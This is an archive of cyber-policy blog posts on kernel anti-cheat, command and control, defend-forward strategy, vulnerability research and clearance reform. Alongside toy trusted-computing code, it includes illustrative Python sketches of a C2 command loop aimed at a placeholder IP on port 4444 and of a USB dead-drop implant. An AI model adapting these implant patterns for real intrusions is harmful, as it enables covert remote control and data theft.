Thursday, May 21, 2020

Chinese Games have Ring0 on Everything

Like many of you, my kids love Doom Eternal, Valorant, Overwatch, Fortnite, Plants Vs Zombies, Team Fortress 2, and many other video games that involve some shooting stuff but mostly calling each other names over the internet. I, on the other hand, often play a game called "Zoom calls where people try to explain what IS and IS NOT critical infrastructure".

Back in the day (two decades ago) when Brandon Baker was at Microsoft writing Palladium, which then became the Next-Generation Secure Computing Base (NGSCB), I had a lot of questions, and the easiest way to answer them was "How would you create a GnuPG binary that could run on an untrusted kernel, and still encrypt files without the kernel being able to get the keys?" You end up with memory fencing and a chain of trust that comes from Dell and signing and sealing and trusted peripherals and all that good stuff.
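
If that sounds abstract, here is a toy simulation of the "sealing" half of the idea - not NGSCB's actual API, just an illustration of binding a key to boot measurements so a tampered kernel can't recover it (every name below is made up):

# Toy sealed storage: real TPMs do this with PCR registers and sealed blobs.
import hashlib, os

def measure(boot_chain):
    """Simulate PCR extension: fold a hash of each boot component into state."""
    state = b"\x00" * 32
    for component in boot_chain:
        state = hashlib.sha256(state + hashlib.sha256(component).digest()).digest()
    return state

def seal(secret, pcr):
    """XOR the secret with a key derived from the boot measurements."""
    pad = hashlib.sha256(pcr).digest()
    return bytes(a ^ b for a, b in zip(secret, pad))  # seal and unseal are symmetric

good_boot = [b"firmware-v1", b"bootloader-v1", b"kernel-v1"]
evil_boot = [b"firmware-v1", b"bootloader-v1", b"kernel-v1-plus-keylogger"]

gpg_key = os.urandom(32)
blob = seal(gpg_key, measure(good_boot))
assert seal(blob, measure(good_boot)) == gpg_key  # trusted kernel recovers the key
assert seal(blob, measure(evil_boot)) != gpg_key  # tampered kernel gets garbage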

The other thing people penciled out was "Remote Attestation", which was essentially "How do you play Quake 2 online and prove to the SERVER that you're not cheating?" In this sense, Trusted Computing is not so much Trusted BY the User as Trusted AGAINST the User.
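
A hedged sketch of what that looks like on the wire, with HMAC standing in for the TPM's asymmetric attestation key purely to keep it self-contained (all names hypothetical):

# Toy remote attestation: the client sends a "quote" - measurements of its
# software state signed by a hardware key - plus a server nonce for freshness.
import hmac, hashlib, os

ATTESTATION_KEY = b"fused-into-the-chip"  # in reality the server holds a public key

def client_quote(measurement, nonce):
    return hmac.new(ATTESTATION_KEY, measurement + nonce, hashlib.sha256).digest()

def server_allows_player(measurement, nonce, sig, known_good):
    genuine = hmac.compare_digest(sig, client_quote(measurement, nonce))
    return genuine and measurement in known_good  # unmodified game client?

nonce = os.urandom(16)
clean = hashlib.sha256(b"quake2.exe v3.20").digest()
assert server_allows_player(clean, nonce, client_quote(clean, nonce), {clean})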

Doom Eternal removed their Ring0 anti-cheat, but it's not that competitive a game really, especially compared to Valorant or Plants vs. Zombies.

Because writing game cheats is somehow (in this dystopia) extremely lucrative (see this Immunity presentation on it), game developers have quite logically invested in a budget implementation of Remote Attestation, largely by including mandatory kernel drivers which get installed alongside your game. These kernel drivers sometimes load bytecode from the internet, are encrypted and obfuscated, and have a wide view of what is running on your system - one you as the gamer or security analyst cannot interpret any more than you can the scripts run by your AV.

To add to your paranoia, as you probably DON'T know, many of the biggest gaming companies are owned or controlled by Tencent, a Chinese conglomerate which is also very active in cyber security, so to speak, even though the studios themselves are often headquartered in the US.

To put it directly, nobody wants to say that Tencent can control nearly every machine in the world via obfuscated bytecode that runs directly in the kernel, but it's not a whole lot of steps between here and there. And aside from direct manipulation, gaming data, which includes lots of PII, offers massive value to any SIGINT organization, has huge implications for running COVCOM networks (c.f. the plot of Homeland), and is generally a high-value target simply because it is assumed to be such a low-value target.

We spend so much of our time trying to define critical infrastructure, but one easy way is to think about your network posture from an attacker's perspective, which hopefully this blogpost did without raising your quarantine-shredded anxiety levels too much. 




Tuesday, May 19, 2020

Asynchronous Command And Control and Why You Care If You Do Cyber Policy

Imagine you were a bipedal alien scientist studying creatures on Earth and you had never seen any before. Like that 50 First Dates movie with Adam Sandler, but instead of fart jokes from a walrus, science. Almost certainly as you examine things with your ultra-sophisticated tools, you are going to become obsessed with cause and effect or command and control. You're going to map every system and say which parts influence other parts. 

In other words, for humans, actions descend from centralized control, carried by a nervous system, with a rationalization of purpose. Even the stupid mitochondria are mislabeled as the "powerhouse of the cell". But this is sadly not how most systems really work! And so when you, the alien scientist, come across an ant colony or a siphonophore or certain species of shrimp and you're literally left reassessing the very meaning of cognition, it's hard not to want to just pretend it doesn't exist.

a picture of some eusocial organisms
Basically everything they taught you in school about eusocial organisms was confused, because the subject is naturally confusing.


It is basically like this in all cyber policy when it comes to how implants and command and control work, and this confusion filters into a lot of the policy frameworks built in various places, such as the Tallinn Manual, export control frameworks, the unfortunately named "PrEP" framework, etc.

Obviously there are a lot of hard definitional questions when it comes to cyber policy:
  • What is an exploit?
  • What is a vulnerability?
  • What is known vs unknown, and the meaning of the word 0day?
  • What is the location of a cyber operation?
  • What is sovereignty and when is it being compromised?
One of the hardest problems is that because remote access can be used both for espionage and for effect (D4 - deny, degrade, disrupt, destroy), and of course also for defensive telemetry, the delimiters for policy control tend to lie outside of view.

So aside from admiring the problem, I wanted to point at a whole new set of problems to admire that we have so far left in a blind spot - worms, emergent behavior, and asynchronous operations. These are the realistic mechanisms which correspond to two major defensive innovations:
  1. Air gaps and air-gap-like network structures (and this includes modern API-driven zero-trust architectures)
  2. Automated network-speed defenses (Microsoft ATP, for example)
Technically everything is a circle if you zoom out far enough, but obviously Tempest exists and hardware implants exist and supply chain chicanery exists.

Part of the problem is the lack of operational examples of decentralized control structures in cyber implants, but I will list the ones we know about here (noting that propagation via USB and control via USB are not the same thing). Three of these were announced just this week, but as far as I can tell there are literally only five publicly known:
  1. 2010 - FLAME (see this amazing Bitdefender article)
  2. 2020 - USB Thief (c.f. ESET here)
  3. 2014 - USB Ferry (Chinese APT c.f. Trend Micro here)
  4. 2017 - RAMSAY (DarkHotel c.f. ESET here)
  5. 2020 - COMpfun (c.f. Kaspersky here, although the section on the USB C2 is slim)
To understand why it is harder to model a system built on passing occasional messages, and even more rarely receiving a response to those messages, it's useful to read James Mickens's essentially perfect paper on the subject here. Implants that take commands from, say, a website are essentially interactive. This is the flavor that Metasploit and CANVAS and CORE Impact model - a simple connected lifestyle of cause and effect. You input a command, you get the result. If you don't get a result, that means either your command has not finished, or your implant has crashed. Those are the two possibilities.
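
In code, the interactive model is just a blocking loop - a sketch with a made-up host and port, implying nothing about any real framework's wire protocol:

# The connected lifestyle: send a command, block until the result arrives.
# If nothing comes back, the command is still running or the implant died.
import socket

def interactive_session(host="198.51.100.7", port=4444):  # hypothetical C2
    s = socket.create_connection((host, port), timeout=30)
    while True:
        s.sendall(input("implant> ").encode())
        print(s.recv(65536).decode())  # cause, then effect - nothing in between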

But in an asynchronous model, your implant is making a lot of its own decisions! It's thinking "Hey, maybe I don't want to do that job yet, because nobody is on this computer right now, and spinning up the CPU and getting really active will set off a lot of bells on the endpoint protection system." Or maybe your command did not get there. Or maybe the response did not get back. Or maybe something got corrupted and a gate to complexity hell opened up. Everything is possible. And hence the behavior of the overall system, like an enraged ant nest, becomes complex and depends on a million factors out of your control.
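
Here is a sketch of that asynchronous flavor, with every name invented for illustration - commands arrive via a dead drop, and the implant, not the operator, decides if and when anything happens:

# Asynchronous tasking: the operator drops task files somewhere (a USB stick,
# a file share) and may wait days for results - or never get them at all.
import json, random
from pathlib import Path

DROP = Path("/mnt/usb/.cache")  # hypothetical dead-drop location

def someone_at_keyboard():
    return random.random() < 0.3  # stand-in for real idle/session checks

def run(task):
    return ("did " + task["cmd"]).encode()  # stub executor for the sketch

def implant_tick():
    """Called occasionally; the implant decides what actually happens."""
    for task_file in sorted(DROP.glob("task-*.json")):
        if someone_at_keyboard():
            return  # too noisy right now; maybe next wakeup, maybe next week
        task = json.loads(task_file.read_text())
        (DROP / ("result-" + task["id"])).write_bytes(run(task))
        task_file.unlink()  # the response now waits for the USB stick to travel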

In other words, I like to add to the list of questions above which haunt us: 
  • What is control, without control?

Monday, April 27, 2020

Defending Forward, aka, hacking the hackers

So the Cyberspace Solarium articles [1] and many other pieces talking about "Defending Forward" have been quite confusing, and I wanted to draw upon a few decades of history to put this strategy in context. In summary: defending forward is a complex and expensive tactic that has a perhaps outsized place in our national strategy, especially as espoused by the Cyberspace Solarium.

The traditional graphic showing the effort required to replace each piece of hacker kit, although obviously at the top is "people". :)

Part of the expense is that hackers are constantly rebuilding their tool chains. Burning their rootkits or trojans or exploits or C2s or targets has one of two effects: they switch to their backups, or they spend a few months doing a rewrite and then move on. Of course, when they rewrite their tools, they are going to do a BETTER job than before, and this means your tracking effort is going to get harder over time.

It's a bit like attacking a footlock in BJJ - you put your own sources and methods at risk by revealing what you know and what you don't know, as this graphic clearly illustrates by showing someone's cell phone selfie and a black space for someone else.


Indictments, a crucial part of the US defend forward and national pressure effort, seek to be even more long-term, by blowing an actual individual or group's cover. One obvious thing this has done (since it has not resulted in convictions or the cessation of Chinese hacking efforts) is lock the people we indict into their government system, instead of allowing them to migrate into defensive jobs in industry, which is probably not in our best interest. Alisa Esage, while not indicted, was sanctioned as part of a US effort and cannot give speeches in Europe because of this. Did this help us? Of course, the smart thing for us to do is include our HUMINT sources in our indictments to provide cover for them. Apparently this has already happened, and I am late on the update as always.

A more extreme example of defend forward in cyber is, of course, the Israeli campaign in Iran, assassinating people involved in their cyber efforts.

Layers of Vulnerability in Cyber Campaigns

I'm going to rank these from easiest to hardest, but it is also walking backwards on the kill chain, if that's your thing.

There are of course multiple ways to skin the onion that is a cyber campaign. You can hack the targets of that campaign, and from those steal the toolkit used. This is a not-inconsequential purpose of some pieces of kit we already know about (sigs.py).

You can also hack (or collect) the C2 and launch servers used by hacker groups, as appears to have been done against many of the Chinese crews, some of which decided to use Facebook and other social networks from their exploitation boxes, blowing their attribution instantly.

You can also hit the analysis arms of various APT groups (e.g. with trojaned Office documents, or directly if you can figure out who they are via HUMINT/SIGINT). This is the most long-term effect you can have against your adversaries.

You can also hack the hackers themselves, which is where historically things have happened amongst hacker groups. There's a rich history here that no cyber strategist should be unfamiliar with because it's the most important analogy to what Defend Forward is trying to do. Let's list some examples:

  • Mitnick Era - You can read about these exciting stories in all sorts of books, but they predate modern life, so I don't recommend basing cyber strategy on them.
  • EL8/PHC/ZF0/#ANTISEC - I'm not trying to imply these are all the same, but they are a modern history everyone in cyber policy should know. 
  • Lulzsec - The public story is that they were eventually rounded up by law enforcement. The private rumor is that they were a victim of an OCO.
  • HackingTeam/GammaGroup - Phineas Fisher is still an unknown hacktivist force wandering around making offers for people to release databases. Lots of people drunkenly claim at conference parties to be him/her though, which is traditional in the hacker world.
  • Dutch vs Russians - A classic example of modern defend forward from a partner state
  • Israel vs Kaspersky/GRU - I only believe about 10% of the NYT reporting on cyber, since it's usually super off-base but it's worth a read.
  • ShadowBrokers - We don't know the details of how this was done, but that was an opdisk, not stolen from C2, so it belongs here as the primary example of how to do denial of national-grade capabilities correctly.


Even with this limited set of examples, it is possible to start putting together some context for how the defend forward strategy matches our capabilities and investment. Much of the public discussion of defend forward talks about escalatory ladders, but I'd like to frame a few questions here that I find more useful for analysis.


  1. Are we deterring adversary action, or simply shaping it to be more covert and have greater long-term impact?
  2. Is our activity cost effective and low on side-effects?

One thing I think people don't recognize about some of the efforts on the above list is that they involve a different type of hacking team than most military or government organizations use today. In particular, '90s hacker groups (c.f. Phineas Fisher) often wrote bespoke tool chains - exploits, implants, C2, and everything - for each target. It was, in modern parlance, a vertically integrated supply chain. It epitomized the opposite of scale and was highly targeted.


The USG has the opposite issue - a thousand potential adversaries, but with the advantages of existing HUMINT and SIGINT infrastructure. The other major difference, of course, is the goal of many of these attacks. For most of the attacks in the list above, the result was a mailspool drop, in many cases along with the full chain of the attack, which adds valuable credibility and is a tool the USG has not yet used.

The "Forward" part of "Defend Forward" is hard enough. The other major issue is finding a way to cause an impact on your adversaries longer than a hummingbird's cough. The easiest metric for whether or not your cyber security strategy is a good one is does it give my adversary more difficult equity issues than I have. The downside of releasing what you know about a target's malware is that they can trace their OPSEC compromises, potentially finding YOUR malware. The upside is that larger corporations, American and otherwise, who have automated threat feeds that include your IoC information may detect and remove the adversary's access. 

On the other hand, they may not.

Friday, April 10, 2020

Informing cyber policy from the vulnerability treadmill

This is a non-trivial part of being in offense or high-level defense.


I recently wrote on the technical mailing list DD about the vulnerability treadmill, which is essentially the huge workload taken on by every technical person in the industry to keep up with the vast amount of exploit information released daily. This firehose of information is distinct from the databases set up by various agencies which are used as lexicons (CVD/CVE/etc.) so various products can in theory talk together over XML pipes.

When talking to policy groups, I like to compare any offensive researcher's lifestyle to one where they spend a few hours a day reading every patent that comes out in a particular field. I do this because you often see news articles about how China has exceeded US patents in some area or another, based on patent application counts.

But CONTENT IS A LEADING INDICATOR. If any five random Chinese patents are ten times as interesting for a professional to read as any five US patents, then you know what's up without having to do the math on who has more. It is this way with vulnerabilities as well.

One of the things that is distressing to technical experts in this area is the policy focus on "patching". Patching is not nearly as important as people (in particular, the Cyberspace Solarium's software liability section) make it sound. If you look at two recent vulnerabilities, the Citrix Netscaler and the recent Symantec Web Gateway vulnerability, you don't see "patchable" vulns.

The first thing to see about the Symantec Web Gateway exploit (here) is that it only exists if an upload directory has been created on the device. I'm not sure how common that is. The other thing to note is that the thing appears to be written in PHP, and to contain a million other bugs, so I don't really care if this particular bug is realistic or not. It's basically impossible to write secure software in PHP or Perl, languages which exist only to prove how hard it can be to write secure software in them.


The Citrix Netscaler exploit sends a similar message of "Your purchasing department failed, and no patch is available for that kind of governance mistake".

"The bug here is ... someone installed PERL and decided to use it on their VPN"

This kind of vulnerability does not exist on equipment when your purchasing department has done their job of due diligence. You don't patch that kind of issue - you rip the equipment out and fire your purchasing manager.

And in fact, banks regularly do this! Josh Corman had a panel on software liability where he discussed a scenario where banks take all the risk and software vendors take none. But this is not true! Banks are extremely tough customers and the majority of Immunity's business for a long time was reviewing the code of various things banks wanted to purchase, BEFORE THEY PURCHASED IT. If we found vulnerabilities that indicated poor code quality, or if the vendor didn't have a process to handle the vulnerabilities we found, they simply didn't buy it.

But what does this bring to a policy discussion? Here are three things you can know from staying on that treadmill:

  1. Patching is often just a quality signal - it can't be used as a metric, for a lot of very complex reasons
  2. The Chinese are actually better at cyber than we are right now. We are the "near peer" in cyberspace. I've read all their public exploits and...that's the state of the art. Thinking otherwise is egotism.
  3. Any norms process is going to have to include a much broader group of countries than just the top three. The Scandinavian countries, South Korea, Japan, and a huge host of "secondary cyber powers" are all far past the point of no return when it comes to capabilities. It is as if we were starting the nuclear norms conversation, but had to take everyone's views into account, including Uzbekistan and Greenpeace. This may color your projections on how realistic these norms discussions are.





Tuesday, March 24, 2020

Recruit, Retain, Reject?


I want to talk about my experience working for the Federal Government, but also look at some wrinkles in the Cyberspace Solarium's efforts to address recruitment and retention. At some level, every government proposal to address this problem is a twelve-dimensional remastering of Groundhog Day. You can see this in the supporting document on Lawfareblog, which focuses on the military talent shortage, possibly inspired by a meeting with CyberCom?

Most reports of this nature nibble around the edges of the problem and the Lawfareblog article proposes the following:

  • Relaxing military grooming and fitness standards for people in IT roles
  • Paying IT people more to compete with private industry
  • Opening offices in cities that people want to work in (or say, in Silicon Valley, where nobody WANTS to work but apparently people end up)
  • Building a skills database (which ironically would probably get hacked)
  • Offering unique perks (like training on emerging technologies, or one-of-a-kind challenge coins!)
All of the typical suggested measures largely ignore the number one issue with recruitment and retention, which is the clearance system. In this day and age, not being able to offer a clearance within a week is insane. In many ways, we need to completely rethink the clearance system, which right now is a one-way door - people are required to be working in the Government or for a Government contractor to hold a clearance, and when they lose it, they rarely get it back, as doing so requires a full-on reprocessing, which can take years.

That brings me to my story. I applied for some scholarships in high school, one with NASA and one with the NSA. My high school grades were not great, but the NSA application included an interview, and I was, even then, as obviously geeky as it got. I had, as it were, mad Turbo Pascal skills, and some beginner assembly language, and the NSA had a voracious appetite for minority students in technical fields like computer science, which I already knew was my focus to the total exclusion of anything else, like social skills or any fashion sense.


At the time the program was called the Undergraduate Training Program and started in 1986 (legend has it a member of the Congressional Black Caucus got a tour of the NSA and didn't see any minorities and threatened to yank funding until he did), but it appears to have been renamed the Stokes Educational Scholarship. I highly recommend it, if you are a high school student reading this blog, or happen to have one near you! 

But also, I think the UTP/Stokes program has offered massive strategic advantages to the United States, getting students into the NSA who otherwise never would have considered it, who have gone on to contribute immeasurably to our national security. It has had high return on investment, in other words. So please don't take this blogpost as saying these efforts are not worth it. However, they will not change the game or solve the problem.

One reason for that is that these programs already exist, and have for over three decades. So what are the new proposals in the Cyberspace Solarium efforts?


Not that we can't "Do more" but aside from the "institutional barrier" of clearances, it's hard to see what we can drastically change to open a huge pipeline of new applicants for the 33K billets we need to fill. 

Ask yourself this:
  • Why does it take 2 years to get a TS-SCI?
  • Why do you lose your clearance after five years of not using it?
  • Why can't a small company hold a facilities clearance? Why do companies hold your clearance, and not the government itself?  
  • Do we know anyone who has given up their clearance, gone on to have a successful private industry career that involved extensive travel, and then re-applied and been accepted? If not, why not?
  • Why have we not already copied and expanded the massively successful NCSC Industry-100 program?

To be fair, the report acknowledges this pain point by asking for a new report!

We don't need another report - we need a massive change to an obviously broken system.


If you've been following DARPA's work in the area, you may have noticed they've already done research on getting people a clearance in a week - we just need the political wherewithal to follow through on implementing it. 

It may be, of course, that even with the clearance roadblock removed, the Culture roadblock, as identified by the authors of the Solarium report, would remain. Culture is not about haircuts and fitness levels - and in fact most hackers I know are very into Brazilian Jiu Jitsu and can run a reasonably fast mile.

Culture is about a deeper set of problems, none of which are in the cyber domain: 
  • Politicization of the Mission, including the ICE mission
  • The Drug War
  • "Stop and Frisk"
  • "Why are we still in Afghanistan?"
If exposure to Stop and Frisk already pre-tuned you to thinking that law enforcement was an unacceptable career path, you're not going to apply to fix IT security issues at the FBI. CISA's mission may be amazing, but you can't retain workers whose friends are getting detained by ICE in front of their kids. You can't have the AG writing polemics against end-to-end encryption and then try to recruit people out of Facebook into DoJ, because they already know the head boss is full of it.

Sometimes you can't solve your recruitment problem by throwing money at the problem, or more scholarships, or reaching out to more people. A better solution would include an agency that is removed from these complications - entirely out of the executive structure, with a mission that attracted the best and brightest because they believed it was uncorrupted. We can still call it CISA!

But until we solve the personnel problem, we can't solve the other problems the Solarium report tries to address. And until we address the Culture and Clearance problems, we can't even begin.




Thursday, March 12, 2020

The Solarium Review - What Sticks Out

Most comprehensive reviews of government policy have little-to-no impact, because they involve complex unpopular legislation, or implementation by an unwilling executive branch, or more often, both.

That's why it's understandable that the members of the Solarium have embarked on a marketing tour, doing podcast after podcast and panel after panel to sell not just the ideas in their paper, but the idea that these things have a hope of getting implemented. It may even be true! To that end, it's good to look at many of the ideas with a critical eye, and in depth.

Some things immediately stand out:

  • Six paragraphs of absolute cowardice on the End-2-End encryption issue
  • The document proposes a heavy lift and massive investment in CISA, which is under DHS
  • So so so much about norms - which in certain circles is like going to a scientific convention and talking about astrology 
  • The section on adding liability to software vendors (4.2) is a difficult task, to say the least.

Each of these items requires a massive paper to analyze. The lack of a stance on E2E encryption, while the document throughout gives the standard polemic on public-private partnership, shows that the Commission was not of the view that the overall technical community needed to be wooed - that you can on one hand go to war with the community on major issues key to their worldview, and on the other hand recruit, retain, and partner with them. This is not how the world works. They missed a once-in-a-decade opportunity.

For CISA - which is under DHS - there are two major issues: 
  • Can CISA handle the lift? Can they scale up and do all the things recommended in the report? Being able to hire and manage that many contractors alone is difficult. We have to assume everything this document asks for is going to be done under someone other than Chris Krebs...
  • Will industry ignore that they sit next to the EXTREMELY UNPOPULAR immigration arm of DHS, which has tainted DHS's whole image to an almost unrecoverable extent?

The software liability issue is complex, but any detailed look at it has to grapple with how weird many of the ideas in this section are. As Perri would say, "There are too many issues in this section to list." Although, to be fair, a future blogpost will do so.


Tuesday, February 11, 2020

The Transmission Curve

Imagine everything your company does, but in terms of a RAR file. Every document, and email, and VOIP call, and Teams message, every password and LDAP entry, every piece of source code in the git repo, and webex, and document scan, and database of PII, and Salesforce spreadsheet. Everything, no matter how trivial, related to the running of your company. If you're a five-hundred-person company, let's say you generate about a Petabyte worth of information per year. This is dominated by useless webex video conference calls, which a hacker could not care less about. A more realistic total cost of ownership (TCO), in terms of bytes, for a five-hundred-person company for one decade is 35 Terabytes (I backed this up with some real-world information and some calculations which I can share as needed - this includes all emails, documents, source code, and phone calls, but no video).

That is currently just over a month of downloading for our hacker friends - but we will be nice and say they only download data at night (aka, 1/3 of the time). A month is a very long time to be "on target", but download size is basically static over the years, while the time required is pressured down by increasing network speeds. If you are in the ever-growing box-of-pain (see below), then every time you get hacked, your entire company's IP value walks out the door.
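
A back-of-envelope check on those numbers - the 35 TB figure is from above, and the link speeds are my assumptions:

TB = 1e12
corp_bytes = 35 * TB  # one decade of a five-hundred-person company, per above

for name, bps in [("100 Mbps", 1e8), ("1 Gbps", 1e9), ("10 Gbps", 1e10)]:
    days = corp_bytes * 8 / bps / 86400
    print(f"{name}: {days:5.1f} days flat out, {days * 3:6.1f} days nights-only")

# 100 Mbps -> ~32 days flat out (the "just over a month"), ~97 nights-only.
# 10 Gbps  -> about 8 hours. The curve only bends one way.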

Everything in this graph is either my estimate or Crowdstrike's, but just understand that as speeds go up, and corporate IP size remains static, the odds of any hacked company being completely downloaded before you catch the pesky hacker go to 1.

Hackers or signals intelligence agencies deal with this question every day in a different form, because 99% of what you see on most networks is useless porn and Windows updates. You want to filter that out on-site and then only send back the good stuff. But as network speeds go up, and storage costs go down, it's often easier to download everything and sort through it later. This is of course similar to the problem a certain large SIGINT group reportedly had.

Following this curve is why I think the Endpoint Security people's 1/10/60-minute rule is ridiculous, and why humans in the loop for security response are also hilarious. Ask yourself: at what speed of network does your company enter the box of pain before the 60 minutes are up?
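
For the record, here is that arithmetic, using the same assumed 35 TB figure:

# At what link speed does the whole 35 TB "RAR file" leave inside the
# 60-minute response window the endpoint vendors promise?
corp_bits = 35e12 * 8
print(f"{corp_bits / 3600 / 1e9:.1f} Gbps")  # ~77.8 Gbps for everything

# Of course the crown jewels are rarely 35 TB: a 35 GB subset clears the
# same 60-minute bar at under 100 Mbps, which is to say, today.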